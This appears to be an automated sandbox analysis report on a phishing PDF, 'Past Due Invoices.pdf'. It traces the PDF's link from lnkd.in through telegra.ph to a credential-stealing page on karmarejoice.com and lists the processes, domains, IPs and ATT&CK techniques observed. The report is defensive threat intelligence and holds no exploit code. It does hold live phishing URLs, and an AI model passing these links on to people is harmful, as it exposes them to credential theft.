    Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeFile opened: C:\Windows\SysWOW64\Msftedit.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdicJump to behavior
    Source: Past Due Invoices.pdfInitial sample: PDF keyword /JS count = 0
    Source: Past Due Invoices.pdfInitial sample: PDF keyword /JavaScript count = 0
    Source: Past Due Invoices.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Temp\6788_754440086\LICENSE.txtJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
    Source: AcroRd32.exe, 00000001.00000000.498483487.0000000005A00000.00000002.00000001.00040000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.531766407.0000000005A00000.00000002.00000001.00040000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.512792146.0000000005A00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: AcroRd32.exe, 00000001.00000000.498483487.0000000005A00000.00000002.00000001.00040000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.531766407.0000000005A00000.00000002.00000001.00040000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.512792146.0000000005A00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
    Source: AcroRd32.exe, 00000001.00000000.498483487.0000000005A00000.00000002.00000001.00040000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.531766407.0000000005A00000.00000002.00000001.00040000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.512792146.0000000005A00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
    Source: AcroRd32.exe, 00000001.00000000.498483487.0000000005A00000.00000002.00000001.00040000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.531766407.0000000005A00000.00000002.00000001.00040000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.512792146.0000000005A00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    1
    Spearphishing Link
    3
    Exploitation for Client Execution
    Path Interception2
    Process Injection
    3
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
    Process Injection
    LSASS Memory1
    Process Discovery
    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
    Non-Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
    File and Directory Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
    Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer1
    Ingress Tool Transfer
    SIM Card SwapCarrier Billing Fraud
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 626309 Sample: Past Due Invoices.pdf Startdate: 13/05/2022 Architecture: WINDOWS Score: 72 28 telegra.ph 2->28 30 part-0032.t-0009.fbs1-t-msedge.net 2->30 32 4 other IPs or domains 2->32 46 Antivirus detection for URL or domain 2->46 48 Phishing site detected (based on favicon image match) 2->48 50 Yara detected HtmlPhish10 2->50 52 2 other signatures 2->52 8 AcroRd32.exe 15 45 2->8         started        signatures3 process4 process5 10 RdrCEF.exe 69 8->10         started        13 chrome.exe 15 275 8->13         started        15 AcroRd32.exe 10 7 8->15         started        dnsIp6 40 192.168.2.1 unknown unknown 10->40 17 RdrCEF.exe 10->17         started        19 RdrCEF.exe 10->19         started        21 RdrCEF.exe 10->21         started        23 RdrCEF.exe 10->23         started        42 239.255.255.250 unknown Reserved 13->42 25 chrome.exe 30 13->25         started        44 lnkd.in 15->44 process7 dnsIp8 34 dancevida.com 50.87.150.0, 443, 49900, 49901 UNIFIEDLAYER-AS-1US United States 25->34 36 telegra.ph 149.154.164.13, 443, 49850, 49854 TELEGRAMRU United Kingdom 25->36 38 17 other IPs or domains 25->38

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Past Due Invoices.pdf0%VirustotalBrowse
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    dancevida.com4%VirustotalBrowse
    part-0032.t-0009.fbs1-t-msedge.net0%VirustotalBrowse
    lnkd.in1%VirustotalBrowse
    karmarejoice.com0%VirustotalBrowse
    SourceDetectionScannerLabelLink
    https://karmarejoice.com/lopi/office-RD117/100%SlashNextCredential Stealing type: Phishing & Social usering
    https://dancevida.com/cgi-sys/suspendedpage.cgi0%Avira URL Cloudsafe
    https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/r90%Avira URL Cloudsafe
    http://cipa.jp/exif/1.0/1.0/40%Avira URL Cloudsafe
    http://cipa.jp/exif/1.0/0%URL Reputationsafe
    https://lnkd.in/dptWHpAay0%Avira URL Cloudsafe
    https://dancevida.com/css/app.css0%Avira URL Cloudsafe
    https://api.echosign.comameArraF~0%Avira URL Cloudsafe
    https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/0%Avira URL Cloudsafe
    https://karmarejoice.com/lopi/office-RD117/images/bg.jpg0%Avira URL Cloudsafe
    http://www.npes.org/pdfx/ns/id/0%URL Reputationsafe
    http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/k0%Avira URL Cloudsafe
    https://dns.google0%URL Reputationsafe
    https://lnkd.in/dptWHpAa0%Avira URL Cloudsafe
    http://ns.useplus.org/ldf/xmp/1.0/0%URL Reputationsafe
    https://lnkd.in/dptWHpAa)0%Avira URL Cloudsafe
    http://iptc.org/std/Iptc4xmpExt/2008-02-29/0%URL Reputationsafe
    http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/0%URL Reputationsafe
    https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/l:0%Avira URL Cloudsafe
    https://lnkd.in/dptWHpAa20%Avira URL Cloudsafe
    https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/#8:m0%Avira URL Cloudsafe
    https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/k80%Avira URL Cloudsafe
    https://lnkd.in/d-ad9VpM0%Avira URL Cloudsafe
    https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/g70%Avira URL Cloudsafe
    https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/0%Avira URL Cloudsafe
    http://www.quicktime.com.Acrobat0%URL Reputationsafe
    https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/883m0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    stackpath.bootstrapcdn.com
    104.18.10.207
    truefalse
      high
      dancevida.com
      50.87.150.0
      truefalseunknown
      accounts.google.com
      142.250.186.77
      truefalse
        high
        edit.telegra.ph
        149.154.164.13
        truefalse
          high
          t.me
          149.154.167.99
          truefalse
            high
            maxcdn.bootstrapcdn.com
            104.18.10.207
            truefalse
              high
              telegra.ph
              149.154.164.13
              truefalse
                high
                part-0032.t-0009.fbs1-t-msedge.net
                13.107.219.60
                truefalseunknown
                lnkd.in
                13.107.42.14
                truefalseunknown
                karmarejoice.com
                103.53.43.226
                truefalseunknown
                cdnjs.cloudflare.com
                104.17.24.14
                truefalse
                  high
                  cs1227.wpc.alphacdn.net
                  192.229.221.185
                  truefalse
                    unknown
                    clients.l.google.com
                    142.250.185.238
                    truefalse
                      high
                      use.fontawesome.com
                      unknown
                      unknownfalse
                        high
                        clients2.google.com
                        unknown
                        unknownfalse
                          high
                          code.jquery.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://dancevida.com/cgi-sys/suspendedpage.cgifalse
                            • Avira URL Cloud: safe
                            unknown
                            https://telegra.ph/images/icons.png?1false
                              high
                              https://telegra.ph/file/9f1d012ceb04882d3fbb6.pngfalse
                                high
                                https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.cssfalse
                                  high
                                  https://telegra.ph/css/core.min.css?46false
                                    high
                                    https://dancevida.com/css/app.cssfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://telegra.ph/js/core.min.js?63false
                                      high
                                      https://telegra.ph/css/quill.core.min.cssfalse
                                        high
                                        https://karmarejoice.com/lopi/office-RD117/images/bg.jpgtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://karmarejoice.com/lopi/office-RD117/true
                                        • SlashNext: Credential Stealing type: Phishing & Social usering
                                        unknown
                                        https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                          high
                                          https://telegra.ph/Past-Due-Invoice-05-13false
                                            high
                                            https://karmarejoice.com/lopi/office-RD117/true
                                            • SlashNext: Credential Stealing type: Phishing & Social usering
                                            unknown
                                            https://telegra.ph/Past-Due-Invoice-05-13false
                                              high
                                              https://lnkd.in/dptWHpAafalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1false
                                                high
                                                https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                                                  high
                                                  https://t.me/_websync_?path=Past-Due-Invoice-05-13&hash=1c67ee9ce8dc79971ffalse
                                                    high
                                                    https://telegra.ph/js/jquery.min.jsfalse
                                                      high
                                                      https://telegra.ph/js/quill.min.js?9false
                                                        high
                                                        https://telegra.ph/images/favicon_2x.png?1false
                                                          high
                                                          https://telegra.ph/favicon.ico?1false
                                                            high
                                                            https://telegra.ph/js/load-image.all.min.js?1false
                                                              high
                                                              https://telegra.ph/js/autosize.min.jsfalse
                                                                high
                                                                https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                                                  high
                                                                  https://edit.telegra.ph/checkfalse
                                                                    high
                                                                    https://lnkd.in/d-ad9VpMfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://telegra.ph/js/jquery.selection.min.jsfalse
                                                                      high
                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                      https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/r9AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      low
                                                                      http://cipa.jp/exif/1.0/1.0/4AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.google.com/images/cleardot.gifcraw_window.js.26.drfalse
                                                                        high
                                                                        http://www.aiim.org/pdfa/ns/schema#AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://easylist.to/)LICENSE.txt.26.drfalse
                                                                            high
                                                                            http://cipa.jp/exif/1.0/AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://lnkd.in/dptWHpAayAcroRd32.exe, 00000001.00000000.535754924.000000000AD32000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://sandbox.google.com/payments/v4/js/integrator.jscraw_window.js.26.dr, manifest.json1.26.drfalse
                                                                              high
                                                                              https://accounts.google.com/MergeSessioncraw_window.js.26.drfalse
                                                                                high
                                                                                https://creativecommons.org/compatiblelicensesLICENSE.txt.26.drfalse
                                                                                  high
                                                                                  https://www.google.come472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.drfalse
                                                                                    high
                                                                                    https://github.com/easylist)LICENSE.txt.26.drfalse
                                                                                      high
                                                                                      http://www.aiim.org/pdfa/ns/type#AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://creativecommons.org/.LICENSE.txt.26.drfalse
                                                                                          high
                                                                                          https://api.echosign.comameArraF~AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          low
                                                                                          https://api.echosign.comAcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            low
                                                                                            https://accounts.google.come472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.drfalse
                                                                                              high
                                                                                              http://www.npes.org/pdfx/ns/id/AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/kAcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.aiim.org/pdfa/ns/extension/AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://apis.google.come472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.drfalse
                                                                                                  high
                                                                                                  https://www.google.com/accounts/OAuthLogin?issueuberauth=1craw_window.js.26.drfalse
                                                                                                    high
                                                                                                    https://www-googleapis-staging.sandbox.google.comcraw_background.js.26.dr, craw_window.js.26.drfalse
                                                                                                      high
                                                                                                      https://clients2.google.come472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.drfalse
                                                                                                        high
                                                                                                        http://www.aiim.org/pdfa/ns/schema#PAcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.aiim.org/pdfa/ns/property#AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://dns.googleb5404c6c-4576-4a9f-a871-af26967eb4e2.tmp.27.dr, 219afb8a-eb1f-4550-9f5b-ca9c25c9cc68.tmp.27.dr, e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.pcraw_background.js.26.dr, craw_window.js.26.drfalse
                                                                                                              high
                                                                                                              https://www.google.com/intl/en-US/chrome/blank.htmlcraw_background.js.26.drfalse
                                                                                                                high
                                                                                                                https://ogs.google.come472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.drfalse
                                                                                                                  high
                                                                                                                  http://ns.useplus.org/ldf/xmp/1.0/AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://lnkd.in/dptWHpAa)AcroRd32.exe, 00000001.00000000.532130124.0000000008FA4000.00000004.00000001.00020000.00000000.sdmp, Past Due Invoices.pdffalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://www.aiim.org/pdfa/ns/id/AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://iptc.org/std/Iptc4xmpExt/2008-02-29/AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://payments.google.com/payments/v4/js/integrator.jscraw_window.js.26.dr, manifest.json1.26.drfalse
                                                                                                                      high
                                                                                                                      http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://www.aiim.org/pdfe/ns/id/AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/l:AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        low
                                                                                                                        https://www.google.com/images/x2.gifcraw_window.js.26.drfalse
                                                                                                                          high
                                                                                                                          https://lnkd.in/dptWHpAa2History Provider Cache.26.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://telegra.ph/Past-Due-Invoice-05-132History Provider Cache.26.drfalse
                                                                                                                            high
                                                                                                                            https://www.google.com/images/dot2.gifcraw_window.js.26.drfalse
                                                                                                                              high
                                                                                                                              http://www.aiim.org/pdfa/ns/id/8AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/#8:mAcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                low
                                                                                                                                http://www.aiim.org/pdfa/ns/id/?AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/k8AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  low
                                                                                                                                  https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/g7AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  low
                                                                                                                                  http://www.aiim.org/pdfa/ns/field#AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    low
                                                                                                                                    https://clients2.googleusercontent.come472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.drfalse
                                                                                                                                      high
                                                                                                                                      http://www.quicktime.com.AcrobatAcroRd32.exe, 00000001.00000000.538137621.000000000B367000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://ims-na1.adobelogin.comAcroRd32.exe, 00000001.00000000.487309761.0000000008E26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.google.com/manifest.json1.26.drfalse
                                                                                                                                          high
                                                                                                                                          https://clients2.google.com/service/update2/crxmanifest.json.26.dr, manifest.json1.26.drfalse
                                                                                                                                            high
                                                                                                                                            https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/883mAcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            low
                                                                                                                                            • No. of IPs < 25%
                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                            • 75% < No. of IPs
                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                            13.107.219.60
                                                                                                                                            part-0032.t-0009.fbs1-t-msedge.netUnited States
                                                                                                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                            104.18.10.207
                                                                                                                                            stackpath.bootstrapcdn.comUnited States
                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                            149.154.167.99
                                                                                                                                            t.meUnited Kingdom
                                                                                                                                            62041TELEGRAMRUfalse
                                                                                                                                            142.250.186.77
                                                                                                                                            accounts.google.comUnited States
                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                            104.17.24.14
                                                                                                                                            cdnjs.cloudflare.comUnited States
                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                            149.154.164.13
                                                                                                                                            edit.telegra.phUnited Kingdom
                                                                                                                                            62041TELEGRAMRUfalse
                                                                                                                                            142.250.185.238
                                                                                                                                            clients.l.google.comUnited States
                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                            13.107.42.14
                                                                                                                                            lnkd.inUnited States
                                                                                                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                            239.255.255.250
                                                                                                                                            unknownReserved
                                                                                                                                            unknownunknownfalse
                                                                                                                                            192.229.221.185
                                                                                                                                            cs1227.wpc.alphacdn.netUnited States
                                                                                                                                            15133EDGECASTUSfalse
                                                                                                                                            103.53.43.226
                                                                                                                                            karmarejoice.comIndia
                                                                                                                                            394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                                                                            50.87.150.0
                                                                                                                                            dancevida.comUnited States
                                                                                                                                            46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                            IP
                                                                                                                                            192.168.2.1
                                                                                                                                            127.0.0.1
                                                                                                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                            Analysis ID:626309
                                                                                                                                            Start date and time: 13/05/202220:43:562022-05-13 20:43:56 +02:00
                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                            Overall analysis duration:0h 8m 4s
                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                            Report type:full
                                                                                                                                            Sample file name:Past Due Invoices.pdf
                                                                                                                                            Cookbook file name:defaultwindowspdfcookbook.jbs
                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                            Number of analysed new started processes analysed:29
                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                            Technologies:
                                                                                                                                            • HCA enabled
                                                                                                                                            • EGA enabled
                                                                                                                                            • HDC enabled
                                                                                                                                            • AMSI enabled
                                                                                                                                            Analysis Mode:default
                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                            Detection:MAL
                                                                                                                                            Classification:mal72.phis.winPDF@46/169@16/14
                                                                                                                                            EGA Information:Failed
                                                                                                                                            HDC Information:Failed
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                            • Number of executed functions: 0
                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Found application associated with file extension: .pdf
                                                                                                                                            • Adjust boot time
                                                                                                                                            • Enable AMSI
                                                                                                                                            • Found PDF document
                                                                                                                                            • Find and activate links
                                                                                                                                            • Security Warning found
                                                                                                                                            • Close Viewer
                                                                                                                                            • Browse: https://lnkd.in/d-ad9VpM
                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                            • Excluded IPs from analysis (whitelisted): 80.67.82.80, 80.67.82.97, 23.211.4.250, 142.250.184.206, 172.217.132.136, 74.125.100.201, 142.250.185.99, 142.250.186.106, 188.114.96.10, 188.114.97.10, 69.16.175.10, 69.16.175.42, 142.250.184.234, 142.250.186.163, 142.250.203.99
                                                                                                                                            • Excluded domains from analysis (whitelisted): logincdn.msauth.net, cds.s5x3j6q5.hwcdn.net, e4578.dscb.akamaiedge.net, clientservices.googleapis.com, r1---sn-5hne6nz6.gvt1.com, use.fontawesome.com.cdn.cloudflare.net, arc.msn.com, r4---sn-5hne6nzs.gvt1.com, acroipm2.adobe.com, r3---sn-5hne6nzk.gvt1.com, redirector.gvt1.com, r3.sn-5hne6nzk.gvt1.com, login.live.com, a122.dscd.akamai.net, sls.update.microsoft.com, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, r4.sn-5hne6nz6.gvt1.com, www.gstatic.com, global-entry-afdthirdparty-fallback.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, content-autofill.googleapis.com, acroipm2.adobe.com.edgesuite.net, aadcdnoriginwus2.azureedge.net, ajax.googleapis.com, lgincdnvzeuno.ec.azureedge.net, r4---sn-5hne6nzk.gvt1.com, aadcdn.msauth.net, r3---sn-5hne6nzd.gvt1.com, r4---sn-5hne6nz6.gvt1.com, firstparty-azurefd-prod.trafficmanager.net, lgincdnvzeuno.azureedge.net, ris.api.iris.microsoft.com, ssl.adobe.com.edg
                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
